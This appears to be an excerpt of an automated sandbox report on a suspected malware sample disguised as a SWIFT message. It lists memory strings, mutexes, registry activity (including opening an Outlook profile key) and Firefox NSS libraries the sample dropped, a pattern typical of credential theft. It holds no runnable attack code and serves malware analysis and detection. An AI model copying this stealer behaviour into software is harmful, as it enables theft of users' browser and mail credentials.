Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Mutant created: \Sessions\1\BaseNamedObjects\AB1F56922-9414907A-A61E15EF-B8590654-32BFA095
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_03

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fivefoldness\Endosseringerne\Fouragen

Jump to behavior

Source: Swift Mesaj#U0131#09971.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7983291992.000000001DD14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019749617.000000001E6E4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7984985942.000000001DD18000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019860859.000000001E6E8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020444307.000000001E700000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988349897.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020557418.000000001E704000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988556068.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.4.dr
Source:	Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7964990945.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015685124.000000001E658000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7966613204.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015801612.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015896144.000000001E660000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.4.dr
Source:	Binary string: ucrtbase.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011268620.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8008974466.000000001E830000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027706325.0000000000060000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.4.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018902003.000000001E6B8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019677898.000000001E6D8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019472505.000000001E6D0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019579766.000000001E6D4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7982644058.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981695416.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988556068.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7989641253.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018902003.000000001E6B8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019253907.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019101053.000000001E6BC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976764480.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976244573.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.4.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8014829170.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981094274.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019472505.000000001E6D0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019579766.000000001E6D4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981695416.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.4.dr
